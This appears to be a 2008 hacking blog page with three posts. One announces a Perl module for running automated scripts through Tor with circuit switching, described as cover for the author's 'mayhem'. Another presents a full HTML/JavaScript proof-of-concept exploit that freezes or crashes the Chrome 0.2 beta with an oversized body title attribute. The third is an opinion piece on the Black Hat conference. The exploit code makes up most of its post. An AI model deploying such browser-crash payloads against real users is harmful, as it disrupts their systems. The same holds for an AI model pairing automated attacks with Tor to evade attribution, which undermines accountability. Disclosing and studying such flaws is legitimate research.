The TorSwitch.pm module

Posted on October 5, 2008
Filed Under Hacking, Projects, Source code | 1 Comment

TorSwitch is basiclly a wrap around Tor module which i wrote in order to make
my life easier while automating some of my mayhem ;).
it could be use for those who want to combain their scripts with Tor anonymity
plus the ability to auto switch Tor’s circuit chain while automating somthing
this module is able to use both HTTP/S proxy(Privoxy) and Tor’s native SOCKS
protocol in order to transfer data.
this module is in its early stages and some modifications has to be made
but i’m too lazy at the moment.
anyway its only a wrap-around module, so if you find it useful
Enjoy ;)

Tar: TorSwitch-0.3.tar

Ready, set, chrome!

Posted on September 8, 2008
Filed Under Exploits, Hacking | 3 Comments

Google’s has lunched their new browser called Chrome in its very early BETA version(0.2.149.27)
and ofcourse everyone is on the race for 0day exploits. So far only few vulnerability has been found most of them are low severity exploits and non of them are a real use for massive 0wnage or somthing
so i thought i’ll give it a try and so far i’ve came up with another kinda useless exploit
i’ve found that Chrome is having a hard time rendering a oversized title attribute causing it to
- freeze under Vista SP1.
- crash in some cases under Windows XP SP1/SP2.

Exploit:

  1. <!
  2.   Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit
  3.   Exploit written by Exodus.
  4.   http://www.blackhat.org.il
  5.   http://www.blackhat.org.il/index.php/ready-set-chrome/
  6.   http://www.blackhat.org.il/exploits/chrome-freeze-exploit.html
  7. >
  8. <HTML>
  9.  <HEAD>
  10.   <TITLE> Chrome(0.2.149.27) title attribute Denial of Service(Freeze) exploit</TITLE>
  11.    <SCRIPT language="JavaScript">
  12.    function buff(len)
  13.  {
  14.   var buffer;
  15.    for(var i = 0; i != len; i++)
  16.   { buffer += 'E';}
  17.   return buffer;
  18.  }
  19. </SCRIPT>
  20.  </HEAD>
  21.  <SCRIPT>
  22.   document.write('<body title=\”' + buff(31337) + '\”>');
  23.  </SCRIPT>
  24.  </BODY>
  25. </HTML>

The Whitehats, Blackhat conference in Vegas?

Posted on August 9, 2008
Filed Under General, Hacking calture | Leave a Comment

lately i’ve been wondering about this so called “Blackhat” conference which is
talking place once in every couple of years.
this year the conference took place in Vegas at the 2-7 of August.
and of course as expected all the big names of the security industry showed up,
but whats really bothering me is that this conference is no more the land of the hackers
those individuals who came because of their thirst for knowledge the desire to understand
and research technology on all of its aspects and to share/exchange their knowledge.
the truth is that this kind of conferences are filled with people
with the desire to make more money and drive more attention to their sponsering
company/product. this is no more the hackers blackhat conference but a whitehat
conference filled with security researchers.

keep looking »